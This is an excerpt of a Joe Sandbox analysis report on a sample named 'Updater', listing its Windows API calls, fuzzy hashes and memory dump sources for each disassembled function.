                                                                                                                                                    • Opcode Fuzzy Hash: 152b8adbe05012fafcbb0bf26109582710007d3a9b82f2bde3cc9cef2aeb271c
                                                                                                                                                    • Instruction Fuzzy Hash: 56313C31A00609FFDB14CF6CC880B99B7F9FB04714F248A6AE91897284C771BDA4DB90
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B337B5: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B338A8
                                                                                                                                                    • KillTimer.USER32(?,00000001), ref: 00B336A2
                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B336B1
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B77D4E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3500052701-0
                                                                                                                                                    • Opcode ID: fff8be23245b18c2cc647b91881ba81b40441aecda3f2428e93d5df9ffb4bec3
                                                                                                                                                    • Instruction ID: 0fb0aef74465c41209670360159ff4e0ba00389c9ccf3cda70e725df37b298c9
                                                                                                                                                    • Opcode Fuzzy Hash: fff8be23245b18c2cc647b91881ba81b40441aecda3f2428e93d5df9ffb4bec3
                                                                                                                                                    • Instruction Fuzzy Hash: 6F31A0B0948344AFEB328F248885BE6BBECDF06704F1044DAE5AE97241DB741A84CB55
                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,00B583FC,?,00BE9910,0000000C), ref: 00B58534
                                                                                                                                                    • GetLastError.KERNEL32(?,00B583FC,?,00BE9910,0000000C), ref: 00B5853E
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B58569
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2583163307-0
                                                                                                                                                    • Opcode ID: 6fd9bb02044b69f7a8c4a88d988c1c79b9f798d3fabb717af69e10f1cef59b43
                                                                                                                                                    • Instruction ID: 013b2c11bd2df97966cf478d99b3a3589030bc0e38b7eaf545e727f4af1fdc8b
                                                                                                                                                    • Opcode Fuzzy Hash: 6fd9bb02044b69f7a8c4a88d988c1c79b9f798d3fabb717af69e10f1cef59b43
                                                                                                                                                    • Instruction Fuzzy Hash: 5E016B32A0556016D62523787C4673E6BC6CF92737F2442D8FC14BB2D3EEA0CC8D8161
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00020119,?), ref: 01407213
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000100,?,00000000,00000000,00020119,?), ref: 0140723A
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00020119,?), ref: 0140725F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                    • Opcode ID: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
                                                                                                                                                    • Instruction ID: 7dc7d5f7e0339f44a83c6fca0c0678c3874b4547449744741c9513d5141696f2
                                                                                                                                                    • Opcode Fuzzy Hash: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
                                                                                                                                                    • Instruction Fuzzy Hash: 4B117371A0020DABCB11EA9DDC81EEFB7BCAF48214F00006AE615E3240DB749A448BA1
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00B5926A,FF8BC369,00000000,00000002,00000000), ref: 00B591F4
                                                                                                                                                    • GetLastError.KERNEL32(?,00B5926A,FF8BC369,00000000,00000002,00000000,?,00B5598F,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00B46AFC), ref: 00B591FE
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B59205
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2336955059-0
                                                                                                                                                    • Opcode ID: 57f5b1598236b295fd83137e0abcad1213338e8e716ff7358121fd57ce649863
                                                                                                                                                    • Instruction ID: 0ff27289af424e131e5700157dec498d1dd3d80578adfa55c8973b907afc8341
                                                                                                                                                    • Opcode Fuzzy Hash: 57f5b1598236b295fd83137e0abcad1213338e8e716ff7358121fd57ce649863
                                                                                                                                                    • Instruction Fuzzy Hash: C8012832610515BBCB059FA9DC05A6E7FA9EB85332B2402C8FC10AB290EB719D00C7A0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: CALL
                                                                                                                                                    • API String ID: 0-4196123274
                                                                                                                                                    • Opcode ID: b533f8c2fcd206d7c9c04df0cf4997f6f57b19c27345f8231068492a0fc57f2d
                                                                                                                                                    • Instruction ID: ac5424f6f19d73d9a4388e98c81428ca8fad1d7009a6f5669131e32136cbea42
                                                                                                                                                    • Opcode Fuzzy Hash: b533f8c2fcd206d7c9c04df0cf4997f6f57b19c27345f8231068492a0fc57f2d
                                                                                                                                                    • Instruction Fuzzy Hash: 42128770508311CFCB24DF24D480B6ABBE1FF84700F2489ADE99A8B361DB75E945CB82
                                                                                                                                                    APIs
                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00B290D4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                    • String ID: CALL
                                                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                                                    • Opcode ID: 222718b356704f2d486692436615cf3f0b282e24081e364bdd2e599a9cdfd65d
                                                                                                                                                    • Instruction ID: a347cf2784ebd72ae97dfa2f0304515757f8536e5452282d3e80fe56c4c8f6ac
                                                                                                                                                    • Opcode Fuzzy Hash: 222718b356704f2d486692436615cf3f0b282e24081e364bdd2e599a9cdfd65d
                                                                                                                                                    • Instruction Fuzzy Hash: 1491AEB0108215DFCB10DF14D880B2ABBE1FF84314F14899CE9995B3A2CB76E955CF92
                                                                                                                                                    APIs
                                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00B771AE
                                                                                                                                                      • Part of subcall function 00B2119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B21192,?), ref: 00B211BF
                                                                                                                                                      • Part of subcall function 00B3FDB9: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B3FDD8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                    • String ID: X
                                                                                                                                                    • API String ID: 779396738-3081909835
                                                                                                                                                    • Opcode ID: 8097d16c7689238345da33570709af90904c49babc4000939f73e0dd1da4dd8a
                                                                                                                                                    • Instruction ID: 2e3c13acc4a3516e0d6be7f9579e5dca21daa706e48c672aeab9523b3895aa3e
                                                                                                                                                    • Opcode Fuzzy Hash: 8097d16c7689238345da33570709af90904c49babc4000939f73e0dd1da4dd8a
                                                                                                                                                    • Instruction Fuzzy Hash: 0221D571A14298ABCB01DF98DC457EE7BFD9F48710F10809AE908F7241DFB45A898FA5
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,00000000,?,?,00B2C03B), ref: 00B31E6E
                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00008000,00000000,?,00000000,?,?,00B2C03B), ref: 00B31EA7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                    • Opcode ID: 8f13128eaed684e25f2caf4f2f33e22fb5a9fee38dd678e518ccf47d5c0b0940
                                                                                                                                                    • Instruction ID: 320a746819024d756f8369faf5e553fe772b6263e51c6e57bb828df399830e43
                                                                                                                                                    • Opcode Fuzzy Hash: 8f13128eaed684e25f2caf4f2f33e22fb5a9fee38dd678e518ccf47d5c0b0940
                                                                                                                                                    • Instruction Fuzzy Hash: 23214735200715AFD720CF19C884B66B7F9FF08710F20896DE9AA97690DBB2F945CB60
                                                                                                                                                    APIs
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B91DC1,?,753CE610), ref: 00B400F0
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00B80B20,00000000,00000000,?,?,00B91DC1,?,753CE610,?,00B80B20), ref: 00B40117
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                    • Opcode ID: ab727228a5a077134a743cd356979c9180f2d8788dd060817f87dde31d38954b
                                                                                                                                                    • Instruction ID: 1d11df188723dbde8de5ee9a59d330c06a813112dada0775ae8c4627aa8dcd59
                                                                                                                                                    • Opcode Fuzzy Hash: ab727228a5a077134a743cd356979c9180f2d8788dd060817f87dde31d38954b
                                                                                                                                                    • Instruction Fuzzy Hash: 250186B5624104BFAB1C6B69DC0AC7F7AEDDF8631071043ADB605D3211E9B5AD00D674
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00B2C025,?,00008000), ref: 00B31F16
                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00B2C025,?,00008000), ref: 00B77483
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 2ce51a5b4be5656185842e3d94ce1d738d8e8ca615aacb0c142bf1c8d08a2cc2
                                                                                                                                                    • Instruction ID: af1c3ad12e7d0590d9ed5126c4bb8ac47219e074f28ae1b1880f51bf4d58f3e5
                                                                                                                                                    • Opcode Fuzzy Hash: 2ce51a5b4be5656185842e3d94ce1d738d8e8ca615aacb0c142bf1c8d08a2cc2
                                                                                                                                                    • Instruction Fuzzy Hash: 03015230245225B6E7315A2ECC0EF977F98EF02B74F208350BAAD6E1E1CBB45854CB90
                                                                                                                                                    APIs
                                                                                                                                                    • IsThemeActive.UXTHEME ref: 00B3FC4A
                                                                                                                                                      • Part of subcall function 00B3FC98: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B3FCAD
                                                                                                                                                      • Part of subcall function 00B3FC98: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B3FCC4
                                                                                                                                                      • Part of subcall function 00B32D33: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B32D63
                                                                                                                                                      • Part of subcall function 00B32D33: IsDebuggerPresent.KERNEL32 ref: 00B32D76
                                                                                                                                                      • Part of subcall function 00B32D33: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00B32DE2
                                                                                                                                                      • Part of subcall function 00B32D33: SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 00B32E63
                                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00B3FC84
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1550534281-0
                                                                                                                                                    • Opcode ID: 63e07966168a0ebc7467ba4b789f432bd0330bea913c6cb7692984bc502dd242
                                                                                                                                                    • Instruction ID: 4fd15d3b9dac7fdd41cda5923a028d2c7182bcad4f5394158d639881c2a0c38f
                                                                                                                                                    • Opcode Fuzzy Hash: 63e07966168a0ebc7467ba4b789f432bd0330bea913c6cb7692984bc502dd242
                                                                                                                                                    • Instruction Fuzzy Hash: 86F058B2984309AFE700AB64ED0AB793BE4F714711F604865F5054B0E2DFB995A1DB88
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0140789C), ref: 0140787B
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 01407881
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFileHandleRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2331702139-0
                                                                                                                                                    • Opcode ID: 1e80be486bc3b2ed8a3ba8aaa4fdb2bdd21a7b2b240338967a6da44621a3724a
                                                                                                                                                    • Instruction ID: c422f8d1e874f2ff0b71d2e3f1878a62310895a55a8fb1d071bdfd8a82a48a05
                                                                                                                                                    • Opcode Fuzzy Hash: 1e80be486bc3b2ed8a3ba8aaa4fdb2bdd21a7b2b240338967a6da44621a3724a
                                                                                                                                                    • Instruction Fuzzy Hash: 13E04F76904205BEE700EFADDCC0EAEB7ECEF44315F60447AB644D2140DA34AA04CB20
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,0140AB65,00000000,0140AB80,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0140A807
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,0140AB65,00000000,0140AB80,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0140A80D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentTerminate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2429186680-0
                                                                                                                                                    • Opcode ID: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
                                                                                                                                                    • Instruction ID: 389e514e9f05f663b1b5477e0c9a2d1a732e15e3fd9370e95a3f347511fa925e
                                                                                                                                                    • Opcode Fuzzy Hash: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
                                                                                                                                                    • Instruction Fuzzy Hash: B2900245A4520210D84032B80956F2A44083F6150AFC00458D30595484889D80488131
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,013EF038), ref: 013EECD4
                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,013EF038), ref: 013EECFB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                    • Opcode ID: b6a2b832005600107881752b35e29ba6e154abcbaa90f7127e9cf256b8b648f4
                                                                                                                                                    • Instruction ID: e5458116b0f61cec3538ea706e41d25a618345ec4a55d3c5b5e489b060dbb611
                                                                                                                                                    • Opcode Fuzzy Hash: b6a2b832005600107881752b35e29ba6e154abcbaa90f7127e9cf256b8b648f4
                                                                                                                                                    • Instruction Fuzzy Hash: 7FF027B3B007315BEB21566D4C8CF5359C6AF45BA4F090070FA08EF3C8D2724C0142A1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b4ad0378dc10b1487367920f55b646ad39d91c8eeb5a914ce7956f348844c29b
                                                                                                                                                    • Instruction ID: 21eddbe9e89f41a7e712836e5dfdf54874deda4328d064be3eb129f37387eead
                                                                                                                                                    • Opcode Fuzzy Hash: b4ad0378dc10b1487367920f55b646ad39d91c8eeb5a914ce7956f348844c29b
                                                                                                                                                    • Instruction Fuzzy Hash: A1423A74A08351CFC764CF19D09062AB7F1FB99B04F2489ADE5898B350D779EE81DB82
                                                                                                                                                    APIs
                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00B26DBE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1385522511-0
                                                                                                                                                    • Opcode ID: 9da4457c54812f319e2bbed703dd75bc70682df5f862f98e200b1442116fc7bd
                                                                                                                                                    • Instruction ID: 51ca3a4f3df9174567af7a766dd112a4cf14289585fb86d79c576c2432e64d62
                                                                                                                                                    • Opcode Fuzzy Hash: 9da4457c54812f319e2bbed703dd75bc70682df5f862f98e200b1442116fc7bd
                                                                                                                                                    • Instruction Fuzzy Hash: 7E32CF75A00229DFCB14DF58D885ABAB7F5FF44304F1580E9E919AB251CB38EE81CB91
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
